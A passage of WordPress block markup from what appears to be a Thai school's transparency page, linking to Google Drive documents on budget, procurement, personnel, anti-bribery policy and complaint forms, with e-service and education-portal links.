900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} 